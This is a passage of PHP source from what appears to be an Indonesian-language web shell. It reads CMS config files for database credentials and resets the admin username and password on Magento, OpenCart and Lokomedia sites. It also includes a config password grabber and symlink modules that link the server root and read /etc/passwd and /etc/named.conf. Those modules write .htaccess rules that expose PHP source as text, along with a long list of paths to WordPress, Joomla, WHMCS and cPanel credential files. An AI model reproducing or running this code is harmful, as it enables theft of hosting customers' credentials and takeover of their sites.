  1182.         $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1183.         $prefix = $dbprefix."admin_user";
  1184.         $option = $dbprefix."core_config_data";
  1185.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1186.         $db = mysql_select_db($dbname);
  1187.         $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1188.         $result = mysql_fetch_array($q);
  1189.         $id = $result[user_id];
  1190.         $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1191.         $result2 = mysql_fetch_array($q2);
  1192.         $target = $result2[value];
  1193.         if($target == '') {
  1194.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1195.         } else {
  1196.           $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1197.         }
  1198.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1199.         echo "[ ".$file_conf." ]<br>";
  1200.         echo "CMS => Magento<br>";
  1201.         echo $url_target;
  1202.         if(!$update OR !$conn OR !$db) {
  1203.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1204.         } else {
  1205.           echo "[+] username: <font color=lime>$user</font><br>";
  1206.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  1207.         }
  1208.         mysql_close($conn);
  1209.       } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1210.         $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1211.         $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1212.         $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1213.         $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1214.         $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1215.         $prefix = $dbprefix."user";
  1216.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1217.         $db = mysql_select_db($dbname);
  1218.         $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1219.         $result = mysql_fetch_array($q);
  1220.         $id = $result[user_id];
  1221.         $target = ambilkata($config,"HTTP_SERVER', '","'");
  1222.         if($target == '') {
  1223.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1224.         } else {
  1225.           $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1226.         }
  1227.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1228.         echo "[ ".$file_conf." ]<br>";
  1229.         echo "CMS => OpenCart<br>";
  1230.         echo $url_target;
  1231.         if(!$update OR !$conn OR !$db) {
  1232.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1233.         } else {
  1234.           echo "[+] username: <font color=lime>$user</font><br>";
  1235.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  1236.         }
  1237.         mysql_close($conn);
  1238.       } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1239.         $dbhost = ambilkata($config,'server = "','"');
  1240.         $dbuser = ambilkata($config,'username = "','"');
  1241.         $dbpass = ambilkata($config,'password = "','"');
  1242.         $dbname = ambilkata($config,'database = "','"');
  1243.         $prefix = "users";
  1244.         $option = "identitas";
  1245.         $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1246.         $db = mysql_select_db($dbname);
  1247.         $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1248.         $result = mysql_fetch_array($q);
  1249.         $target = $result[alamat_website];
  1250.         if($target == '') {
  1251.           $target2 = $result[url];
  1252.           $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1253.           if($target2 == '') {
  1254.             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1255.           } else {
  1256.             $cek_login3 = file_get_contents("$target2/adminweb/");
  1257.             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1258.             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1259.               $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1260.             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1261.               $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1262.             } else {
  1263.               $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1264.             }
  1265.           }
  1266.         } else {
  1267.           $cek_login = file_get_contents("$target/adminweb/");
  1268.           $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1269.           if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1270.             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1271.           } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1272.             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1273.           } else {
  1274.             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1275.           }
  1276.         }
  1277.         $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
  1278.         echo "[ ".$file_conf." ]<br>";
  1279.         echo "CMS => Lokomedia<br>";
  1280.         if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1281.           echo $url_target2;
  1282.         } else {
  1283.           echo $url_target;
  1284.         }
  1285.         if(!$update OR !$conn OR !$db) {
  1286.           echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1287.         } else {
  1288.           echo "[+] username: <font color=lime>$user</font><br>";
  1289.           echo "[+] password: <font color=lime>$pass</font><br><br>";
  1290.         }
  1291.         mysql_close($conn);
  1292.       }
  1293.     }
  1294.   }    
  1295. }
  1296. elseif(isset($_GET['do']) && ($_GET['do'] == 'grabpass')) {
  1297. if($_POST['gass']) {
  1298.     echo "<center><h1>Config Password Grabber</h1>
  1299.        <form method='post'>
  1300.        Link Config: <br>
  1301.        <textarea name='link' style='width: 450px; height:250px;'>";
  1302.     UrlLoop($_POST['linkconf'],'txt');  
  1303.     echo"</textarea><br>
  1304.        <input type='submit' style='width: 450px;' name='grabpass' value='Hajar!!'>
  1305.        </form></center>";
  1306. }   else {
  1307.         echo "<center><h1>Joomla Auto Change User 2</h1>
  1308.        <form method='post'>
  1309.        Link Config: <br>
  1310.        <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/0xsym/'><br>
  1311.        <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1312.        </form></center>";
  1313.     }
  1314. if($_POST['grabpass']) {
  1315.    
  1316.  
  1317.         $link = explode("\r\n", $_POST['link']);
  1318.         echo '<textarea>';
  1319.         foreach($link as $dir_config) {
  1320.             $ambilpass=ambil_password($dir_config);
  1321.             $hh=@file_get_contents("password.txt");
  1322.             @file_put_contents("password.txt", $hh.$ambilpass);
  1323.            
  1324. echo $ambilpass;
  1325.  
  1326.  
  1327.                     }
  1328.         echo '</textarea>';
  1329.     }  
  1330. }
  1331. elseif(isset($_GET['do']) && ($_GET['do'] == 'symlink')) {
  1332.    
  1333. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1334. $d0mains = @file("/etc/named.conf");
  1335. ##httaces
  1336. if($d0mains){
  1337. @mkdir("0xsymlink",0777);
  1338. @chdir("0xsymlink");
  1339. @exe("ln -s / root");
  1340. $file3 = 'Options Indexes FollowSymLinks
  1341. DirectoryIndex jancox.htm
  1342. AddType text/plain .php
  1343. AddHandler text/plain .php
  1344. Satisfy Any';
  1345. $fp3 = fopen('.htaccess','w');
  1346. $fw3 = fwrite($fp3,$file3);
  1347. @fclose($fp3);
  1348. echo "
  1349. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1350. <tr>
  1351. <td align=center><font size=2>S. No.</font></td>
  1352. <td align=center><font size=2>Domains</font></td>
  1353. <td align=center><font size=2>Users</font></td>
  1354. <td align=center><font size=2>Symlink</font></td>
  1355. </tr>";
  1356. $dcount = 1;
  1357. foreach($d0mains as $d0main){
  1358. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1359. flush();
  1360. if(strlen(trim($domains[1][0])) > 2){
  1361. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1362. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1363. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1364. <td>".$user['name']."</td>
  1365. <td><a href='$full/0xsymlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1366. flush();
  1367. $dcount++;}}}
  1368. echo "</table>";
  1369. }else{
  1370. $TEST=$etcpasswd;
  1371. if ($TEST){
  1372. @mkdir("0xsymlink",0777);
  1373. @chdir("0xsymlink");
  1374. exe("ln -s / root");
  1375. $file3 = 'Options Indexes FollowSymLinks
  1376. DirectoryIndex jancox.htm
  1377. AddType text/plain .php
  1378. AddHandler text/plain .php
  1379. Satisfy Any';
  1380.  $fp3 = fopen('.htaccess','w');
  1381.  $fw3 = fwrite($fp3,$file3);
  1382.  @fclose($fp3);
  1383.  echo "
  1384. <table align=center border=1><tr>
  1385. <td align=center><font size=3>S. No.</font></td>
  1386. <td align=center><font size=3>Users</font></td>
  1387. <td align=center><font size=3>Symlink</font></td></tr>";
  1388.  $dcount = 1;
  1389.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1390.  // $file=$etcpasswd;
  1391.  while(!feof($file)){
  1392.  $s = fgets($file);
  1393.  $matches = array();
  1394.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1395.  $matches = str_replace("home/","",$matches[1]);
  1396.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1397.  continue;
  1398.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1399. <td align=center><font class=txt>" . $matches . "</td>";
  1400.  echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1401.  $dcount++;}fclose($file);
  1402.  echo "</table>";
  1403. }else{
  1404.  
  1405.     if($os != "Windows"){
  1406.         @mkdir("0xsymlink",0777);
  1407.         @chdir("0xsymlink");
  1408.         @exe("ln -s / root");
  1409.         $file3 = '
  1410. Options Indexes FollowSymLinks
  1411. DirectoryIndex jancox.htm
  1412. AddType text/plain .php
  1413. AddHandler text/plain .php
  1414. Satisfy Any
  1415. ';
  1416.  $fp3 = fopen('.htaccess','w');
  1417.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1418.  echo "
  1419. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1420. <table align=center border=1><tr>
  1421. <td align=center><font size=3>ID</font></td>
  1422. <td align=center><font size=3>Users</font></td>
  1423. <td align=center><font size=3>Symlink</font></td></tr>";
  1424.  $temp = "";$val1 = 0;$val2 = 1000;
  1425.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1426.  if ($uid)$temp .= join(':',$uid)."\n";}
  1427.  echo '<br/>';$temp = trim($temp);$file5 =
  1428.  fopen("test.txt","w");
  1429.  fputs($file5,$temp);
  1430.  fclose($file5);$dcount = 1;$file =
  1431.  fopen("test.txt", "r") or exit("Unable to open file!");
  1432.  while(!feof($file)){$s = fgets($file);$matches = array();
  1433.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1434.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1435.  continue;
  1436.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1437. <td align=center><font class=txt>" . $matches . "</td>";
  1438.  echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1439.  $dcount++;}
  1440.  fclose($file);
  1441.  echo "</table></div></center>";unlink("test.txt");
  1442.  } else
  1443.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  1444.  }
  1445.  }    
  1446. }
  1447. elseif(isset($_GET['do']) && ($_GET['do'] == 'config')) {
  1448.     if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1449. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  1450. exit;
  1451. }
  1452.     if($_POST){ if($_POST['tipe'] == 'grabsymv') {
  1453.         @mkdir("0xsymv", 0777);
  1454. exe("ln -s / 0xsymv/root");
  1455. $htaccess="Options Indexes FollowSymLinks
  1456. DirectoryIndex jancox.htm
  1457. AddType text/plain .php
  1458. AddHandler text/plain .php
  1459. Satisfy Any";
  1460. @file_put_contents("0xsymv/.htaccess",$htaccess);
  1461.         $etc_passwd=$_POST['passwd'];
  1462.    
  1463.     $etc_passwd=explode("\n",$etc_passwd);
  1464. foreach($etc_passwd as $passwd){
  1465. $pawd=explode(":",$passwd);
  1466. $user =$pawd[5];
  1467. $usera = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  1468. if (preg_match('/vhosts/i',$user)){
  1469. exe("ln -s ".$user."/httpdocs/wp-config.php 0xsymv/".$usera."-Wordpress.txt");
  1470. exe("ln -s ".$user."/httpdocs/configuration.php 0xsymv/".$usera."-Joomla.txt");
  1471. exe("ln -s ".$user."/httpdocs/config/koneksi.php 0xsymv/".$usera."-Lokomedia.txt");
  1472. exe("ln -s ".$user."/httpdocs/forum/config.php 0xsymv/".$usera."-phpBB.txt");
  1473. exe("ln -s ".$user."/httpdocs/sites/default/settings.php 0xsymv/".$usera."-Drupal.txt");
  1474. exe("ln -s ".$user."/httpdocs/config/settings.inc.php 0xsymv/".$usera."-PrestaShop.txt");
  1475. exe("ln -s ".$user."/httpdocs/app/etc/local.xml 0xsymv/".$usera."-Magento.txt");
  1476. exe("ln -s ".$user."/httpdocs/admin/config.php 0xsymv/".$usera."-OpenCart.txt");
  1477. exe("ln -s ".$user."/httpdocs/application/config/database.php 0xsymv/".$usera."-Ellislab.txt");
  1478. }}}
  1479. if($_POST['tipe'] == 'grabsym') {
  1480. @mkdir("0xsym", 0777);
  1481. @symlink("/","0xsym/root");
  1482. $htaccess="Options Indexes FollowSymLinks
  1483. DirectoryIndex jancox.htm
  1484. AddType text/plain .php
  1485. AddHandler text/plain .php
  1486. Satisfy Any";
  1487. @file_put_contents("0xsym/.htaccess",$htaccess);}
  1488. if($_POST['tipe'] == 'grabsym404') {
  1489. @mkdir("0xsym404", 0777);
  1490. @symlink("/","0xsym404/root");
  1491. $htaccess="Options Indexes FollowSymLinks
  1492. DirectoryIndex jancox.htm
  1493. AddType text/plain .php
  1494. AddHandler text/plain .php
  1495. Satisfy Any
  1496. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  1497. AddIcon '' ^^DIRECTORY^^
  1498. DefaultIcon ''
  1499. IndexIgnore *.txt404
  1500. IndexStyleSheet 'https://0x1999.github.io/0xShell/style/melex.css'
  1501. RewriteEngine On
  1502. RewriteCond %{REQUEST_FILENAME} ^.*0xsym404 [NC]
  1503. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  1504. @file_put_contents("0xsym404/.htaccess",$htaccess);
  1505. }
  1506. if($_POST['tipe'] == 'grab') {
  1507.                         mkdir("0xgrab", 0777);
  1508.                         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1509.                         $htc = fopen("0xgrab/.htaccess","w");
  1510.                         fwrite($htc, $isi_htc);
  1511. }
  1512. $passwd = $_POST['passwd'];
  1513.  
  1514. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1515. foreach($user_config[1] as $user_cox) {
  1516. $grab_config = array(
  1517. "/home/$user_cox/.accesshash" => "WHM-accesshash",
  1518. "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  1519. "/home/$user_cox/public_html/forum/config.php" => "phpBB",
  1520. "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  1521. "/home/$user_cox/public_html/config/settings.inc.php" => "Shop",
  1522. "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
  1523. "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  1524. "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",
  1525. "/home/$user_cox/public_html/vb/includes/config.php" => "Vbulletin",
  1526. "/home/$user_cox/public_html/includes/config.php" => "Vbulletin",
  1527. "/home/$user_cox/public_html/forum/includes/config.php" => "Vbulletin",
  1528. "/home/$user_cox/public_html/forums/includes/config.php" => "Vbulletin",
  1529. "/home/$user_cox/public_html/cc/includes/config.php" => "Vbulletin",
  1530. "/home/$user_cox/public_html/inc/config.php" => "MyBB",
  1531. "/home/$user_cox/public_html/includes/configure.php" => "OsCommerce",
  1532. "/home/$user_cox/public_html/shop/includes/configure.php" => "OsCommerce",
  1533. "/home/$user_cox/public_html/os/includes/configure.php" => "OsCommerce",
  1534. "/home/$user_cox/public_html/oscom/includes/configure.php" => "OsCommerce",
  1535. "/home/$user_cox/public_html/products/includes/configure.php" => "OsCommerce",
  1536. "/home/$user_cox/public_html/cart/includes/configure.php" => "OsCommerce",
  1537. "/home/$user_cox/public_html/inc/conf_global.php" => "IPB",
  1538. "/home/$user_cox/public_html/wp-config.php" => "Wordpress",
  1539. "/home/$user_cox/public_html/wp/test/wp-config.php" => "Wordpress",
  1540. "/home/$user_cox/public_html/blog/wp-config.php" => "Wordpress",
  1541. "/home/$user_cox/public_html/beta/wp-config.php" => "Wordpress",
  1542. "/home/$user_cox/public_html/portal/wp-config.php" => "Wordpress",
  1543. "/home/$user_cox/public_html/site/wp-config.php" => "Wordpress",
  1544. "/home/$user_cox/public_html/wp/wp-config.php" => "Wordpress",
  1545. "/home/$user_cox/public_html/WP/wp-config.php" => "Wordpress",
  1546. "/home/$user_cox/public_html/news/wp-config.php" => "Wordpress",
  1547. "/home/$user_cox/public_html/wordpress/wp-config.php" => "Wordpress",
  1548. "/home/$user_cox/public_html/test/wp-config.php" => "Wordpress",
  1549. "/home/$user_cox/public_html/demo/wp-config.php" => "Wordpress",
  1550. "/home/$user_cox/public_html/home/wp-config.php" => "Wordpress",
  1551. "/home/$user_cox/public_html/v1/wp-config.php" => "Wordpress",
  1552. "/home/$user_cox/public_html/v2/wp-config.php" => "Wordpress",
  1553. "/home/$user_cox/public_html/press/wp-config.php" => "Wordpress",
  1554. "/home/$user_cox/public_html/new/wp-config.php" => "Wordpress",
  1555. "/home/$user_cox/public_html/blogs/wp-config.php" => "Wordpress",
  1556. "/home/$user_cox/public_html/configuration.php" => "Joomla",
  1557. "/home/$user_cox/public_html/blog/configuration.php" => "Joomla",
  1558. "/home/$user_cox/public_html/submitticket.php" => "^WHMCS",
  1559. "/home/$user_cox/public_html/cms/configuration.php" => "Joomla",
  1560. "/home/$user_cox/public_html/beta/configuration.php" => "Joomla",
  1561. "/home/$user_cox/public_html/portal/configuration.php" => "Joomla",
  1562. "/home/$user_cox/public_html/site/configuration.php" => "Joomla",
  1563. "/home/$user_cox/public_html/main/configuration.php" => "Joomla",
  1564. "/home/$user_cox/public_html/home/configuration.php" => "Joomla",
  1565. "/home/$user_cox/public_html/demo/configuration.php" => "Joomla",
  1566. "/home/$user_cox/public_html/test/configuration.php" => "Joomla",
  1567. "/home/$user_cox/public_html/v1/configuration.php" => "Joomla",
  1568. "/home/$user_cox/public_html/v2/configuration.php" => "Joomla",
  1569. "/home/$user_cox/public_html/joomla/configuration.php" => "Joomla",
  1570. "/home/$user_cox/public_html/new/configuration.php" => "Joomla",
  1571. "/home/$user_cox/public_html/WHMCS/submitticket.php" => "WHMCS",
  1572. "/home/$user_cox/public_html/whmcs1/submitticket.php" => "WHMCS",
  1573. "/home/$user_cox/public_html/Whmcs/submitticket.php" => "WHMCS",
  1574. "/home/$user_cox/public_html/whmcs/submitticket.php" => "WHMCS",
  1575. "/home/$user_cox/public_html/whmcs/submitticket.php" => "WHMCS",
  1576. "/home/$user_cox/public_html/WHMC/submitticket.php" => "WHMCS",
  1577. "/home/$user_cox/public_html/Whmc/submitticket.php" => "WHMCS",
  1578. "/home/$user_cox/public_html/whmc/submitticket.php" => "WHMCS",
  1579. "/home/$user_cox/public_html/WHM/submitticket.php" => "WHMCS",
  1580. "/home/$user_cox/public_html/Whm/submitticket.php" => "WHMCS",
  1581. "/home/$user_cox/public_html/whm/submitticket.php" => "WHMCS",
  1582. "/home/$user_cox/public_html/HOST/submitticket.php" => "WHMCS",
  1583. "/home/$user_cox/public_html/Host/submitticket.php" => "WHMCS",
  1584. "/home/$user_cox/public_html/host/submitticket.php" => "WHMCS",
  1585. "/home/$user_cox/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1586. "/home/$user_cox/public_html/Supportes/submitticket.php" => "WHMCS",
  1587. "/home/$user_cox/public_html/supportes/submitticket.php" => "WHMCS",
  1588. "/home/$user_cox/public_html/domains/submitticket.php" => "WHMCS",
  1589. "/home/$user_cox/public_html/domain/submitticket.php" => "WHMCS",
  1590. "/home/$user_cox/public_html/Hosting/submitticket.php" => "WHMCS",
  1591. "/home/$user_cox/public_html/HOSTING/submitticket.php" => "WHMCS",
  1592. "/home/$user_cox/public_html/hosting/submitticket.php" => "WHMCS",
  1593. "/home/$user_cox/public_html/CART/submitticket.php" => "WHMCS",
  1594. "/home/$user_cox/public_html/Cart/submitticket.php" => "WHMCS",
  1595. "/home/$user_cox/public_html/cart/submitticket.php" => "WHMCS",
  1596. "/home/$user_cox/public_html/ORDER/submitticket.php" => "WHMCS",
  1597. "/home/$user_cox/public_html/Order/submitticket.php" => "WHMCS",
  1598. "/home/$user_cox/public_html/order/submitticket.php" => "WHMCS",
  1599. "/home/$user_cox/public_html/CLIENT/submitticket.php" => "WHMCS",
  1600. "/home/$user_cox/public_html/Client/submitticket.php" => "WHMCS",
  1601. "/home/$user_cox/public_html/client/submitticket.php" => "WHMCS",
  1602. "/home/$user_cox/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1603. "/home/$user_cox/public_html/Clientarea/submitticket.php" => "WHMCS",
  1604. "/home/$user_cox/public_html/clientarea/submitticket.php" => "WHMCS",
  1605. "/home/$user_cox/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1606. "/home/$user_cox/public_html/Support/submitticket.php" => "WHMCS",
  1607. "/home/$user_cox/public_html/support/submitticket.php" => "WHMCS",
  1608. "/home/$user_cox/public_html/BILLING/submitticket.php" => "WHMCS",
  1609. "/home/$user_cox/public_html/Billing/submitticket.php" => "WHMCS",
  1610. "/home/$user_cox/public_html/billing/submitticket.php" => "WHMCS",
  1611. "/home/$user_cox/public_html/BUY/submitticket.php" => "WHMCS",
  1612. "/home/$user_cox/public_html/Buy/submitticket.php" => "WHMCS",
  1613. "/home/$user_cox/public_html/buy/submitticket.php" => "WHMCS",
  1614. "/home/$user_cox/public_html/MANAGE/submitticket.php" => "WHMCS",
  1615. "/home/$user_cox/public_html/Manage/submitticket.php" => "WHMCS",
  1616. "/home/$user_cox/public_html/manage/submitticket.php" => "WHMCS",
  1617. "/home/$user_cox/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1618. "/home/$user_cox/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1619. "/home/$user_cox/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1620. "/home/$user_cox/public_html/clientsupport/submitticket.php" => "WHMCS",
  1621. "/home/$user_cox/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1622. "/home/$user_cox/public_html/Checkout/submitticket.php" => "WHMCS",
  1623. "/home/$user_cox/public_html/checkout/submitticket.php" => "WHMCS",
  1624. "/home/$user_cox/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1625. "/home/$user_cox/public_html/Billings/submitticket.php" => "WHMCS",
  1626. "/home/$user_cox/public_html/billings/submitticket.php" => "WHMCS",
  1627. "/home/$user_cox/public_html/BASKET/submitticket.php" => "WHMCS",
  1628. "/home/$user_cox/public_html/Basket/submitticket.php" => "WHMCS",
  1629. "/home/$user_cox/public_html/basket/submitticket.php" => "WHMCS",
  1630. "/home/$user_cox/public_html/SECURE/submitticket.php" => "WHMCS",
  1631. "/home/$user_cox/public_html/Secure/submitticket.php" => "WHMCS",
  1632. "/home/$user_cox/public_html/secure/submitticket.php" => "WHMCS",
  1633. "/home/$user_cox/public_html/SALES/submitticket.php" => "WHMCS",
  1634. "/home/$user_cox/public_html/Sales/submitticket.php" => "WHMCS",
  1635. "/home/$user_cox/public_html/sales/submitticket.php" => "WHMCS",
  1636. "/home/$user_cox/public_html/BILL/submitticket.php" => "WHMCS",
  1637. "/home/$user_cox/public_html/Bill/submitticket.php" => "WHMCS",
  1638. "/home/$user_cox/public_html/bill/submitticket.php" => "WHMCS",
  1639. "/home/$user_cox/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1640. "/home/$user_cox/public_html/Purchase/submitticket.php" => "WHMCS",
  1641. "/home/$user_cox/public_html/purchase/submitticket.php" => "WHMCS",
  1642. "/home/$user_cox/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1643. "/home/$user_cox/public_html/Account/submitticket.php" => "WHMCS",
  1644. "/home/$user_cox/public_html/account/submitticket.php" => "WHMCS",
  1645. "/home/$user_cox/public_html/USER/submitticket.php" => "WHMCS",
  1646. "/home/$user_cox/public_html/User/submitticket.php" => "WHMCS",
  1647. "/home/$user_cox/public_html/user/submitticket.php" => "WHMCS",
  1648. "/home/$user_cox/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1649. "/home/$user_cox/public_html/Clients/submitticket.php" => "WHMCS",
  1650. "/home/$user_cox/public_html/clients/submitticket.php" => "WHMCS",
  1651. "/home/$user_cox/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1652. "/home/$user_cox/public_html/Billings/submitticket.php" => "WHMCS",
  1653. "/home/$user_cox/public_html/billings/submitticket.php" => "WHMCS",
  1654. "/home/$user_cox/public_html/MY/submitticket.php" => "WHMCS",
  1655. "/home/$user_cox/public_html/My/submitticket.php" => "WHMCS",
  1656. "/home/$user_cox/public_html/my/submitticket.php" => "WHMCS",
  1657. "/home/$user_cox/public_html/secure/whm/submitticket.php" => "WHMCS",
  1658. "/home/$user_cox/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1659. "/home/$user_cox/public_html/panel/submitticket.php" => "WHMCS",
  1660. "/home/$user_cox/public_html/clientes/submitticket.php" => "WHMCS",
  1661. "/home/$user_cox/public_html/cliente/submitticket.php" => "WHMCS",
  1662. "/home/$user_cox/public_html/support/order/submitticket.php" => "WHMCS",
  1663. "/home/$user_cox/public_html/bb-config.php" => "BoxBilling",
  1664. "/home/$user_cox/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1665. "/home/$user_cox/public_html/box/bb-config.php" => "BoxBilling",
  1666. "/home/$user_cox/public_html/host/bb-config.php" => "BoxBilling",
  1667. "/home/$user_cox/public_html/Host/bb-config.php" => "BoxBilling",
  1668. "/home/$user_cox/public_html/supportes/bb-config.php" => "BoxBilling",
  1669. "/home/$user_cox/public_html/support/bb-config.php" => "BoxBilling",
  1670. "/home/$user_cox/public_html/hosting/bb-config.php" => "BoxBilling",
  1671. "/home/$user_cox/public_html/cart/bb-config.php" => "BoxBilling",
  1672. "/home/$user_cox/public_html/order/bb-config.php" => "BoxBilling",
  1673. "/home/$user_cox/public_html/client/bb-config.php" => "BoxBilling",
  1674. "/home/$user_cox/public_html/clients/bb-config.php" => "BoxBilling",
  1675. "/home/$user_cox/public_html/cliente/bb-config.php" => "BoxBilling",
  1676. "/home/$user_cox/public_html/clientes/bb-config.php" => "BoxBilling",
  1677. "/home/$user_cox/public_html/billing/bb-config.php" => "BoxBilling",
  1678. "/home/$user_cox/public_html/billings/bb-config.php" => "BoxBilling",
  1679. "/home/$user_cox/public_html/my/bb-config.php" => "BoxBilling",
  1680. "/home/$user_cox/public_html/secure/bb-config.php" => "BoxBilling",
  1681. "/home/$user_cox/public_html/support/order/bb-config.php" => "BoxBilling",
  1682. "/home/$user_cox/public_html/includes/dist-configure.php" => "Zencart",
  1683. "/home/$user_cox/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1684. "/home/$user_cox/public_html/products/includes/dist-configure.php" => "Zencart",
  1685. "/home/$user_cox/public_html/cart/includes/dist-configure.php" => "Zencart",
  1686. "/home/$user_cox/public_html/shop/includes/dist-configure.php" => "Zencart",
  1687. "/home/$user_cox/public_html/includes/iso4217.php" => "Hostbills",
  1688. "/home/$user_cox/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1689. "/home/$user_cox/public_html/host/includes/iso4217.php" => "Hostbills",
  1690. "/home/$user_cox/public_html/Host/includes/iso4217.php" => "Hostbills",
  1691. "/home/$user_cox/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1692. "/home/$user_cox/public_html/support/includes/iso4217.php" => "Hostbills",
  1693. "/home/$user_cox/public_html/hosting/includes/iso4217.php" => "Hostbills",
